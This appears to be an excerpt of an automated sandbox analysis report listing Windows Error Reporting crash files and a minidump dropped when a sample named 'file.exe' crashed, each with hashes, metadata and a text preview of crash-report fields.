                                                      SHA-512:CE44A524F15E5EFD1F34DE70A1FEFF24FB6352F2F5139C088E023E770E80C811BAEDF05DF7E38C5AFE9DA542161DB9FC8792C9872F915A8D42EAF34B0C16B4B7
                                                      Malicious:true
                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.6.9.9.2.4.0.7.7.2.9.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.b.d.3.1.2.a.3.-.3.8.b.8.-.4.a.d.a.-.a.d.6.5.-.1.f.2.c.1.e.1.7.1.b.6.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.1.6.6.d.3.f.4.-.9.d.3.6.-.4.7.e.f.-.b.6.3.8.-.0.0.c.c.f.5.7.0.3.e.f.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.7.c.-.0.0.0.1.-.0.0.1.9.-.a.5.7.9.-.e.c.5.c.8.8.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.e.b.b.b.0.c.3.5.8.6.b.8.a.0.2.4.4.5.8.5.e.a.c.b.4.4.c.a.1.2.5.a.c.9.3.3.a.d.8.e.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.S.p.l.i.t.

                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_43a044097e5f3ef507ce7a9f19c0e6d280fb_440dec59_0fa97499\Report.wer

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.8276699661029949
                                                      Encrypted:false
                                                      SSDEEP:192:tG1VfavUFH56rrE3jDk/u7swS274It1hBx:W2c56rwjg/u7swX4ItN
                                                      MD5:8E6DF1FEDD2DCDFEEAD81E751F1E9E30
                                                      SHA1:A28E1D741B8018EAC8302C3631FBD1FB1A1B5C74
                                                      SHA-256:5B387D32E08D4D09C09360B6713B6F2BDC20C4C801BF05A9FA7B335D40AE770F
                                                      SHA-512:CB26D8837B531A206CD37DF93526F11027C8E5A840C05079D77A81F1463987454A4F125BEB6670629697FEA539AE4B0B1614D423056DE0DBAA80A51B0A339F26
                                                      Malicious:true
                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.6.9.7.2.5.8.8.2.6.7.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.b.5.2.3.2.f.6.-.0.2.0.5.-.4.8.6.e.-.a.9.6.e.-.f.f.e.2.2.7.b.7.f.1.4.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.a.d.8.2.7.2.b.-.3.6.4.7.-.4.b.1.a.-.b.3.8.d.-.7.a.5.b.6.a.6.3.5.7.a.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.7.c.-.0.0.0.1.-.0.0.1.9.-.a.5.7.9.-.e.c.5.c.8.8.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.e.b.b.b.0.c.3.5.8.6.b.8.a.0.2.4.4.5.8.5.e.a.c.b.4.4.c.a.1.2.5.a.c.9.3.3.a.d.8.e.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.S.p.l.i.t.

                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_43a044097e5f3ef507ce7a9f19c0e6d280fb_440dec59_0fb9b83a\Report.wer

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.8645912092877456
                                                      Encrypted:false
                                                      SSDEEP:192:OG1VfavMFH56rrE3jDm/u7swS274It1hBx:V2E56rwjC/u7swX4ItN
                                                      MD5:BFE67807DC0602F55378507755440CEE
                                                      SHA1:B3EB70858BDCE565941C6E0F060FC884B3ADEF6D
                                                      SHA-256:653586F31427F3303B54C7BDAE8B0671116DC96D1442414B4F322B8DE2FBC17B
                                                      SHA-512:E9DE1C42FEBFF12DCBE0CD19AAC56582A97B5E165F266FA099D3C6B6D0F453BBC6177D6581553CD1CE7F309520844187934AD4D4CA2470B755E5D4549D64788B
                                                      Malicious:true
                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.6.9.8.9.4.4.9.7.0.7.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.a.e.2.b.f.8.7.-.d.c.2.0.-.4.4.f.c.-.b.4.8.0.-.c.6.5.b.a.c.7.b.6.4.2.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.c.6.f.3.9.9.7.-.1.3.9.0.-.4.9.0.9.-.9.9.4.c.-.f.8.1.7.8.3.9.8.6.2.d.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.7.c.-.0.0.0.1.-.0.0.1.9.-.a.5.7.9.-.e.c.5.c.8.8.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.e.b.b.b.0.c.3.5.8.6.b.8.a.0.2.4.4.5.8.5.e.a.c.b.4.4.c.a.1.2.5.a.c.9.3.3.a.d.8.e.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.S.p.l.i.t.

                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_43a044097e5f3ef507ce7a9f19c0e6d280fb_440dec59_14062c50\Report.wer

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.9178695391219902
                                                      Encrypted:false
                                                      SSDEEP:192:+ZG1Vfav7FH56rrE3jDy8/u7swS274It1hBx:+62x56rwjD/u7swX4ItN
                                                      MD5:CA143ECEC56682C4667E60F8CC68A65F
                                                      SHA1:AAAF4F27FCAB944C8AF953F479475148857C665F
                                                      SHA-256:31D5C72900C85B7EE64B1D9E0125812EBD969D2FA3E3EF8744A43412E39B2314
                                                      SHA-512:3456367071CBD45B03310FECF31C50F732E4C3EB6A66963F09BE3CD8E8F9B8ED896F76A1B797C3AC695C40768AD45F626B2EB4B63F73DD9C0EDFD627A3C5C559
                                                      Malicious:true
                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.7.0.1.9.3.7.0.4.2.6.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.c.e.6.7.7.7.a.-.5.f.9.4.-.4.1.5.c.-.9.0.3.0.-.d.e.9.5.7.1.e.6.d.f.a.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.e.4.6.8.3.4.a.-.f.6.2.a.-.4.4.a.e.-.8.f.c.4.-.1.d.9.f.b.b.1.4.9.1.7.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.7.c.-.0.0.0.1.-.0.0.1.9.-.a.5.7.9.-.e.c.5.c.8.8.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.e.b.b.b.0.c.3.5.8.6.b.8.a.0.2.4.4.5.8.5.e.a.c.b.4.4.c.a.1.2.5.a.c.9.3.3.a.d.8.e.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.S.p.l.i.t.

                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_43a044097e5f3ef507ce7a9f19c0e6d280fb_440dec59_1431a86b\Report.wer

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.8419314888891837
                                                      Encrypted:false
                                                      SSDEEP:192:86bG1VfavFFH56rrE3jDB/u7swS274It1hBx:8682P56rwjl/u7swX4ItN
                                                      MD5:5F781DC311C9F39A8DF1C3D0EB4D85B2
                                                      SHA1:5660436EBC6CA12BA0081C30895423D4495E6DB1
                                                      SHA-256:E958CD79B8663CD546443A8FB101F4932E1B78A6D9BE0AAEE8DA6D1A7BD102F4
                                                      SHA-512:034BABD2EE208DDA30EC06F53707A3B6386859E9F45B40AAE66AAD3B10AAEC71F11797EF991C3B17C61228FD368C30046EE30E5AA1A29E536DE961EFA7AD26A9
                                                      Malicious:true
                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.6.9.8.1.9.9.7.0.6.7.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.6.a.d.9.7.b.5.-.4.e.3.4.-.4.d.f.6.-.b.c.3.6.-.f.8.a.5.d.4.6.a.4.f.7.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.3.c.b.b.3.9.8.-.3.f.b.4.-.4.2.4.2.-.b.2.a.a.-.b.4.b.b.d.0.0.9.4.5.6.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.7.c.-.0.0.0.1.-.0.0.1.9.-.a.5.7.9.-.e.c.5.c.8.8.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.e.b.b.b.0.c.3.5.8.6.b.8.a.0.2.4.4.5.8.5.e.a.c.b.4.4.c.a.1.2.5.a.c.9.3.3.a.d.8.e.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.S.p.l.i.t.

                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_43a044097e5f3ef507ce7a9f19c0e6d280fb_440dec59_17918727\Report.wer

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.8419290418748682
                                                      Encrypted:false
                                                      SSDEEP:192:3G1Vfav7FH56rrE3jDB/u7swS274It1hBx:g2x56rwjl/u7swX4ItN
                                                      MD5:05C5565B84AF00791301D3D05D4A5A7C
                                                      SHA1:E3071FBA62D46995DB3DE686D83F6B25B8313922
                                                      SHA-256:7824D8794AE43997AD79EC7AECD2B15D4DE6C75ABF430143470CADD47A7ABEDD
                                                      SHA-512:DD7B7D2B0EC0DFF20B0E47A404E75A5DAB161A6C2117583D5F58174D4830B976E0D10FED9F9FA1B4032D24F888F8A274858EB80017F3F5600EFCBB1E6C2334FE
                                                      Malicious:true
                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.6.9.7.7.0.8.6.8.9.8.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.8.b.c.9.6.5.4.-.b.4.7.0.-.4.9.3.4.-.9.3.1.7.-.a.6.c.3.3.3.5.b.7.9.2.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.c.d.9.7.b.e.a.-.0.a.8.e.-.4.0.4.2.-.9.e.3.e.-.6.9.5.5.6.4.f.0.f.4.f.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.7.c.-.0.0.0.1.-.0.0.1.9.-.a.5.7.9.-.e.c.5.c.8.8.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.e.b.b.b.0.c.3.5.8.6.b.8.a.0.2.4.4.5.8.5.e.a.c.b.4.4.c.a.1.2.5.a.c.9.3.3.a.d.8.e.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.S.p.l.i.t.

                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_43a044097e5f3ef507ce7a9f19c0e6d280fb_440dec59_17c5cdc5\Report.wer

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.8844034957297929
                                                      Encrypted:false
                                                      SSDEEP:192:QfG1VfavBFH56rrE3jDyG/u7swS274It1hBx:QI2D56rwjJ/u7swX4ItN
                                                      MD5:D56429A7633BE3262EEE75F7265F8DDF
                                                      SHA1:F04A49AFC5F084360D2A08CEDF09AAAB69AFC029
                                                      SHA-256:3556DD34019427E27224730C2127784CA6CB63422B8CA11562C20DC3483D07D8
                                                      SHA-512:17FDE668172122D084BBE84BB0A49A43BB742371B313009CB2175CE8964B00DE64DF00AE5A804CB58A01DF5E4A0CBC24435F7787EA0C9BDD3CAEA7E04BF70EED
                                                      Malicious:true
                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.6.9.9.5.3.2.4.2.9.2.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.9.4.3.2.3.b.e.-.0.6.7.7.-.4.3.0.e.-.b.3.a.1.-.1.5.9.e.5.9.b.4.6.3.f.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.1.8.7.4.3.c.9.-.3.7.3.4.-.4.d.8.6.-.a.5.5.7.-.7.9.a.7.b.3.8.8.9.9.b.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.7.c.-.0.0.0.1.-.0.0.1.9.-.a.5.7.9.-.e.c.5.c.8.8.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.e.b.b.b.0.c.3.5.8.6.b.8.a.0.2.4.4.5.8.5.e.a.c.b.4.4.c.a.1.2.5.a.c.9.3.3.a.d.8.e.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.S.p.l.i.t.

                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_43a044097e5f3ef507ce7a9f19c0e6d280fb_440dec59_17e1912a\Report.wer

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.8413309258427019
                                                      Encrypted:false
                                                      SSDEEP:192:mG1VfavIFH56rrE3jDB/u7swS274It1hBx:t2456rwjl/u7swX4ItN
                                                      MD5:0AB96516285C4951270041601DA48B24
                                                      SHA1:E6EB4AA60BD3ADECB8D821ED8A85ABEBFDB828BE
                                                      SHA-256:4CCF61E5ED702AAA4C42AF5011EAC0434377D6817405B16836A2BD16D1B75A0F
                                                      SHA-512:B960BD998AE897E33B9BABEC19FD6412CFD5F1BDFDB92C1FEB6FA9C5A9A1BE5E09C150675E9A534480173A4C3DC0A03CCD247FDD631515B169EBE7FD22A5C9BB
                                                      Malicious:true
                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.6.9.7.9.6.4.5.7.8.9.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.6.4.d.7.3.c.0.-.2.a.6.f.-.4.9.c.c.-.9.d.9.3.-.8.9.0.3.2.5.f.b.a.0.0.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.8.0.0.0.2.c.d.-.d.c.1.5.-.4.9.d.7.-.a.1.d.4.-.8.8.0.e.3.0.0.d.5.f.7.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.7.c.-.0.0.0.1.-.0.0.1.9.-.a.5.7.9.-.e.c.5.c.8.8.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.e.b.b.b.0.c.3.5.8.6.b.8.a.0.2.4.4.5.8.5.e.a.c.b.4.4.c.a.1.2.5.a.c.9.3.3.a.d.8.e.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.S.p.l.i.t.

                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_83ec7e94952b3dcbb61bd30e98682b9f65d64_440dec59_0e4aaad7\Report.wer

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.9867845917103395
                                                      Encrypted:false
                                                      SSDEEP:192:3NG1VfavF8Hox3uSE3jDyL+/u7sLS274It1hBx:322uox3uFjd/u7sLX4ItN
                                                      MD5:FFE341DAFC29395559DE290B63B67E17
                                                      SHA1:EF54570106945D489099041CB737B2FE57BD730E
                                                      SHA-256:530C1F7B56B02455CE3F3C289710665848468A91A1005229DFB49C10E88FB0DC
                                                      SHA-512:487D6BDA9EB61D59CE06368C8DFA859612F58214CFFAE8495532D37A662DB1D1F36EDD5D1C866E80C721C6E59171F716E1820176D1BFADC95493B009009CD19D
                                                      Malicious:true
                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.7.0.5.1.4.5.7.8.7.3.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.d.2.2.8.5.4.e.-.4.9.3.a.-.4.5.6.9.-.b.6.f.a.-.4.8.6.c.5.9.d.5.6.d.8.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.c.1.1.1.6.4.e.-.3.5.b.f.-.4.e.2.c.-.a.9.e.f.-.6.5.f.8.3.c.6.a.e.1.3.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.7.c.-.0.0.0.1.-.0.0.1.9.-.a.5.7.9.-.e.c.5.c.8.8.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.e.b.b.b.0.c.3.5.8.6.b.8.a.0.2.4.4.5.8.5.e.a.c.b.4.4.c.a.1.2.5.a.c.9.3.3.a.d.8.e.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.S.p.l.i.t.

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER276E.tmp.dmp

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:30:19 2022, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):117066
                                                      Entropy (8bit):2.1634369641325306
                                                      Encrypted:false
                                                      SSDEEP:768:gjTPXz8b284K1UZYDPz90272rZROEsmvP5tK+T8:6z8jH+ZYrz976tRvsmvP5tKm8
                                                      MD5:7E07887FA1DE8C32864D20247C47BE8C
                                                      SHA1:FE26C4AEDD264ECCF4F38ACD9B57908CC252D22F
                                                      SHA-256:C11448C73BE0D8A7CD04F5A196C6DC1CE77E582AAC7C041AB95B58CD63E1040E
                                                      SHA-512:56F41346895F54BD0436EE8E534BE799A6E2AD0F437AAD2E7CBEB6C099830E06894527511F7A0BE44C3D3E85418684FEF6E642450CF70BC3F328F1A34A1F1F1A
                                                      Malicious:false
                                                      Preview:MDMP....... ........~;c............D...............L.......D...rI..........T.......8...........T............2..............$................................................................................U...........B..............GenuineIntelW...........T.......|...h~;c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER2A00.tmp.WERInternalMetadata.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8408
                                                      Entropy (8bit):3.6938148571549747
                                                      Encrypted:false
                                                      SSDEEP:192:Rrl7r3GLNi/CQ6I7Des6YBSPSUqgmf6TS4CpBA89bMysfFEm:RrlsNil6Id6YBaSUqgmf+SfMxfz
                                                      MD5:A3BF00D56CDD8B5E244BD9227956D3A5
                                                      SHA1:B25A8B1E6FB03E728AB65E92E8008EAF0893434A
                                                      SHA-256:9CE885F16F62BFE12B3445ADB58B8889716C8EFD41A9181EB3DC81C4A63AF116
                                                      SHA-512:1938907D972BE3940B2F002E21BC1644D3F943FE382C4FB7CA96EBB4BFEED83355C8FAF7642EA147DC48E518ACDC599DE7959B33A8398FD13E7D36A286FBCFBA
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.1.9.6.<./.P.i.d.>.......

